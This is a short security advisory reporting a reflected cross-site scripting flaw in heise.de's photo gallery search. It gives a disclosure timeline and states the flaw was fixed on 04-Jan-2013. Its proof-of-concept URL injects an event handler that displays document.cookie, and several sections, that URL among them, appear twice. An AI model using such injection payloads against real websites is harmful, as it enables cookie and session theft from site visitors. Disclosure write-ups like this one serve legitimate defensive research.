SSCHADV2013-002 - heise.de - Cross-site Scripting vulnerability
Advisory:
|
heise.de – Cross-site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2013-002
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on heise.de
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
http://www.heise.de is prone to a XSS vulnerability
======================
PoC-Exploit
======================
http://www.heise.de/foto/galerie/suche/photo/?suchwort=" onMouseMove=alert(document.cookie) ‘
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
03-Jan-2013 – heise Security informed
04-Jan-2013 – fixed by developer
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2013/SSCHADV2013-002.txt
PoC-Exploit
======================
http://www.heise.de/foto/galerie/suche/photo/?suchwort=" onMouseMove=alert(document.cookie) ‘
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
03-Jan-2013 – heise Security informed
04-Jan-2013 – fixed by developer
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2013/SSCHADV2013-002.txt
Comments
Display comments as Linear | Threaded
Meisi on :
Und das passiert heise, tztztz.